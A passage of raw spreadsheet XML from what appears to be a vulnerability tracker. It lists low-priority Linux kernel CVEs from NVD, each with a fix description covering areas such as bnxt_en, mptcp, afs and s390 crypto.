        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97568</t>
        </is>
      </c>
      <c r="D513" s="5" t="inlineStr"/>
      <c r="E513" s="5" t="inlineStr"/>
      <c r="F513" s="5" t="inlineStr"/>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr"/>
      <c r="S513" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: syncookies: remember the request backup flag
Instead of using an uninitialised bit when copying the info in
subflow_ulp_clone().
To fix this, no need to extend the join_entry structure: backup is
coming from struct mptcp_subflow_request_sock, only one bit. Do the same
here by using one bit for both.</t>
        </is>
      </c>
      <c r="T513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97568</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97569</t>
        </is>
      </c>
      <c r="D514" s="5" t="inlineStr"/>
      <c r="E514" s="5" t="inlineStr"/>
      <c r="F514" s="5" t="inlineStr"/>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr"/>
      <c r="S514" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Prevent queue stop with deferred completions
When the driver receives a burst of packets, it can mark a BD with the
NO_CMPL bit to defer completions. The expectation is that the last
packet in the ring will have this bit unset and the completion generated
by that packet will cleanup that packet and the ones preceding it. This
helps to reduce the number of completions fired.
The suppressed completions are controlled by the driver and the number
of packets with suppressed completions scales with the size of the ring.
SW USO packets, on the other hand, have an upper bound on the maximum
number of BDs which can be consumed which does not scale with the ring
size.
So, for small rings it is possible that: a burst of packets is handed to
the driver, the driver defers completions for all of the packets because
the number of free descriptors stays above the threshold in the driver.
Then, a USO packet arrives, but the number of BDs available is not
enough and the USO code exits early.
In this case, you end up in a state where the ring is full of packets
with their completions suppressed, which can cause the queue to stop and
never be restarted.
Assuming default CONFIG_MAX_SKB_FRAGS, this is only possible for small
rings (&lt;= 457 descriptors, below the driver default value) when
a burst of packets fills the ring, followed by a large USO packet that
can't fit. For larger rings, the delta between the completion
suppression threshold and the BDs required for SW USO is large enough
that completions will fire and this case is unreachable.
This issue was pointed out by Sashiko and while it seems fairly unlikely
given that the queue size must be small to trigger this, it is indeed
possible.
Fix this by tracking the last BD which deferred completions and
centralizing the logic for deciding when to ring the doorbell. The NO_CMPL
bit is now cleared in bnxt_txr_db_kick(), so every doorbell site is
covered, including the SW USO early exit. This guarantees the ring always
ends in a BD which generates a completion to clean it and wake the queue.</t>
        </is>
      </c>
      <c r="T514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97569</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97571</t>
        </is>
      </c>
      <c r="D515" s="5" t="inlineStr"/>
      <c r="E515" s="5" t="inlineStr"/>
      <c r="F515" s="5" t="inlineStr"/>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr"/>
      <c r="S515" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Propagate TPA buffer allocation failures in bnxt_queue_mem_alloc()
bnxt_alloc_one_tpa_info_data() returns -ENOMEM as soon as one allocation
fails. This leaves the remaining rxr-&gt;rx_tpa[] entries zeroed.
bnxt_queue_mem_alloc() discards that return value, so the partially
initialized ring is installed by bnxt_queue_start().
Since the agg_id is picked by the hardware and bnxt_alloc_agg_idx maps
it to a SW index in rxr-&gt;rx_tpa[], it is possible that an uninitialized
slot can be chosen which would hand a zero DMA address to the device.
Fix this by checking the return value of bnxt_alloc_one_tpa_info_data
and unwinding, freeing the ring buffers.</t>
        </is>
      </c>
      <c r="T515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97571</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97572</t>
        </is>
      </c>
      <c r="D516" s="5" t="inlineStr"/>
      <c r="E516" s="5" t="inlineStr"/>
      <c r="F516" s="5" t="inlineStr"/>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr"/>
      <c r="S516" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Propagate RX ring init failures in bnxt_init_nic()
bnxt_init_rx_rings() returns an error when bnxt_alloc_one_rx_ring()
fails, but bnxt_init_nic() discards that return value and calls
bnxt_init_chip(), which enables TPA.
If an allocation fails, this could leave rxr-&gt;rx_tpa[] partially zeroed
and TPA would be enabled over an array with zeroed entries. This would
lead to a zeroed DMA address being handed out if the agg_idx is
translated to a SW index at a zeroed entry.
Fix this by propagating the error out of bnxt_init_nic(). Both callers
already check its return value and unwind with bnxt_free_skbs() and
bnxt_free_mem(), which tolerate a partially initialized RX ring.</t>
        </is>
      </c>
      <c r="T516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97572</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97574</t>
        </is>
      </c>
      <c r="D517" s="5" t="inlineStr"/>
      <c r="E517" s="5" t="inlineStr"/>
      <c r="F517" s="5" t="inlineStr"/>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="inlineStr"/>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q517" s="5" t="inlineStr"/>
      <c r="R517" s="5" t="inlineStr"/>
      <c r="S517" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Don't free the live ring's TPA state on queue restart failure
bnxt_queue_mem_alloc() shallow copies the live RX ring into the clone:
  memcpy(clone, rxr, sizeof(*rxr));
the code currently clears pointers that the clone owns (such as
rx_agg_bmap), but rx_tpa and rx_tpa_idx_map are left pointing at memory
of the live ring that was cloned.
If an allocation failure happens later and the err_free_tpa_info label
is taken, the live ring's memory can be freed while still in use.
Fix this by initializing the clone's pointers to NULL to prevent live
ring state from being freed inadvertently.</t>
        </is>
      </c>
      <c r="T517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97574</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97581</t>
        </is>
      </c>
      <c r="D518" s="5" t="inlineStr"/>
      <c r="E518" s="5" t="inlineStr"/>
      <c r="F518" s="5" t="inlineStr"/>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q518" s="5" t="inlineStr"/>
      <c r="R518" s="5" t="inlineStr"/>
      <c r="S518" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: verisilicon: hantro: bound G2 HEVC tile loop to the buffer capacity
prepare_tile_info_buffer() writes one entry per tile into the tile_sizes
DMA buffer, sized for a grid equal to the PPS uAPI array capacity. Use the
bounded v4l2_hevc_pps_num_tile_columns() / v4l2_hevc_pps_num_tile_rows()
helpers so the loops stay inside the buffer.</t>
        </is>
      </c>
      <c r="T518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97581</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97582</t>
        </is>
      </c>
      <c r="D519" s="5" t="inlineStr"/>
      <c r="E519" s="5" t="inlineStr"/>
      <c r="F519" s="5" t="inlineStr"/>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr"/>
      <c r="S519" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (gpio-fan) Fix use-after-free in alarm work
fan_alarm_irq_handler() queues fan_data-&gt;alarm_work, but nothing
cancels it.  fan_alarm_notify() dereferences fan_data and its hwmon
device.  On unbind, devres frees the interrupt, which only waits for
the handler itself, and then releases the hwmon device and fan_data,
so a pending fan_alarm_notify() can run after those frees.
Replace INIT_WORK() with devm_work_autocancel(), registered before
devm_request_irq().  The devres cleanup then frees the interrupt
first, so no new work can be queued, and cancels the work while
fan_data and the hwmon device are still alive.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97582</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97585</t>
        </is>
      </c>
      <c r="D520" s="5" t="inlineStr"/>
      <c r="E520" s="5" t="inlineStr"/>
      <c r="F520" s="5" t="inlineStr"/>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q520" s="5" t="inlineStr"/>
      <c r="R520" s="5" t="inlineStr"/>
      <c r="S520" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Fix double-unmap of directory block
Fix afs_edit_dir_remove() to use a cleanup function to unmap the block
pointed to by afs_dir_iter::block if it's left pointing to something rather
than manually kunmapping the blocks.  Manually kunmapping without clearing
iter.blocks can result in a double-kunmap if afs_dir_find_block() is called
twice in a row (which would be the case if the block being modified is not
first in the hash chain).</t>
        </is>
      </c>
      <c r="T520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97585</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97586</t>
        </is>
      </c>
      <c r="D521" s="5" t="inlineStr"/>
      <c r="E521" s="5" t="inlineStr"/>
      <c r="F521" s="5" t="inlineStr"/>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q521" s="5" t="inlineStr"/>
      <c r="R521" s="5" t="inlineStr"/>
      <c r="S521" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Fix missing kunmap in afs_dir_search_bucket()
Fix afs_dir_search_bucket() to kunmap the block it's using in the "bad:"
path.</t>
        </is>
      </c>
      <c r="T521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97586</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97587</t>
        </is>
      </c>
      <c r="D522" s="5" t="inlineStr"/>
      <c r="E522" s="5" t="inlineStr"/>
      <c r="F522" s="5" t="inlineStr"/>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="inlineStr"/>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr"/>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q522" s="5" t="inlineStr"/>
      <c r="R522" s="5" t="inlineStr"/>
      <c r="S522" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf: RISC-V: store available counter mask as bitmap
The available-counter mask was a single unsigned long, but iteration
uses RISCV_MAX_COUNTERS, which is 64. On RV32 that reads past the object.
Filling with an unsigned-long bit at index 32 and above is also wrong.
Use DECLARE_BITMAP and set_bit/bitmap helpers. Walk each bitmap word
into CFG_MATCH when checking events, when allocating an index, and when
stopping all counters. Set the counter base to i times BITS_PER_LONG.
Share the CFG_MATCH ecall through a small helper so the 32-bit argument
split is not duplicated. On qemu-system-riscv32 the probe bitmap has bits
above XLEN set, so the first word alone is not enough.
[pjw@kernel.org: updated to apply; fixed checkpatch.pl issues]</t>
        </is>
      </c>
      <c r="T522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97587</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97588</t>
        </is>
      </c>
      <c r="D523" s="5" t="inlineStr"/>
      <c r="E523" s="5" t="inlineStr"/>
      <c r="F523" s="5" t="inlineStr"/>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr"/>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q523" s="5" t="inlineStr"/>
      <c r="R523" s="5" t="inlineStr"/>
      <c r="S523" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Map EBUSY to EIO when key conversion fails repeatedly
When hardware persistently returns -EBUSY after exhausting retries,
the error propagates to crypto_finalize_*_request(). The crypto API's
completion wrapper treats -EBUSY as a queueing status and swallows it,
preventing the completion callback from firing. This causes callers
using crypto_wait_req() to block indefinitely.
Translate persistent -EBUSY to -EIO after retry exhaustion to ensure
proper error propagation and callback invocation.</t>
        </is>
      </c>
      <c r="T523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97588</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97590</t>
        </is>
      </c>
      <c r="D524" s="5" t="inlineStr"/>
      <c r="E524" s="5" t="inlineStr"/>
      <c r="F524" s="5" t="inlineStr"/>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr"/>
      <c r="S524" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix missing scrub of temp buffers with PAES algorithm
In function ctr_paes_do_crypt() there is a buffer used to process
remaining bytes &lt; AES_BLOCK_SIZE. This buffer was not scrubbed and
thus could lead to expose of unwanted data. Rework the code to
explicitly scrub the buffer at the end of the function to avoid
exposure of maybe sensitive data.
In function __xts_2keys_prep_param() change the existing scrub to
clean the whole param block instead of just the key field.</t>
        </is>
      </c>
      <c r="T524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97590</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97591</t>
        </is>
      </c>
      <c r="D525" s="5" t="inlineStr"/>
      <c r="E525" s="5" t="inlineStr"/>
      <c r="F525" s="5" t="inlineStr"/>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q525" s="5" t="inlineStr"/>
      <c r="R525" s="5" t="inlineStr"/>
      <c r="S525" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix handling of EBUSY in PHMAC when req is pushed to crypto engine
When a request is transferred to the engine via
crypto_transfer_hash_request_to_engine() there are two return codes
signaling a successful transfer: EINPROGRESS and EBUSY. However the
correct handling of EBUSY was missing and has been added as a return
code indicating a successful transfer to the crypto engine.</t>
        </is>
      </c>
      <c r="T525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97591</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97592</t>
        </is>
      </c>
      <c r="D526" s="5" t="inlineStr"/>
      <c r="E526" s="5" t="inlineStr"/>
      <c r="F526" s="5" t="inlineStr"/>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr"/>
      <c r="S526" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix missing scrub of temp buffers with AES ctr and gcm algorithm
In function ctr_aes_crypt() there is a buffer used to process
remaining bytes &lt; AES_BLOCK_SIZE. This buffer was not scrubbed and
thus could lead to expose of unwanted data. When the buffer is used
explicitly scrub it at the end of the code block to avoid exposure of
maybe sensitive data.
In a similar way the function gcm_aes_crypt() hat an error path where
the CPACF param block was not scrubbed. Instead of return early now
these error paths go to end of function where explicit scrubbing is
done. Similar with the buffers which are part of the gcm_sg_walk
structs from the variables gw_in and gw_out.</t>
        </is>
      </c>
      <c r="T526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97592</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97593</t>
        </is>
      </c>
      <c r="D527" s="5" t="inlineStr"/>
      <c r="E527" s="5" t="inlineStr"/>
      <c r="F527" s="5" t="inlineStr"/>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q527" s="5" t="inlineStr"/>
      <c r="R527" s="5" t="inlineStr"/>
      <c r="S527" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/s390: Fix NULL dereference in iova_to_phys() with ZPCI_TABLE_TYPE_RFX
When using a 5-level translation table via ZPCI_TABLE_TYPE_RFX
get_rso_from_iova() returns NULL when the region-first entry is invalid.
Yet in get_rto_from_iova() the region-second origin rso is not checked
to be non-NULL before accessing rso[rsx] leading to a NULL pointer
dereference instead of a NULL return when iova_to_phys() is called on
a unmapped IOVA. Fix this by adding the missing NULL check.</t>
        </is>
      </c>
      <c r="T527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97593</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97596</t>
        </is>
      </c>
      <c r="D528" s="5" t="inlineStr"/>
      <c r="E528" s="5" t="inlineStr"/>
      <c r="F528" s="5" t="inlineStr"/>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="inlineStr"/>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
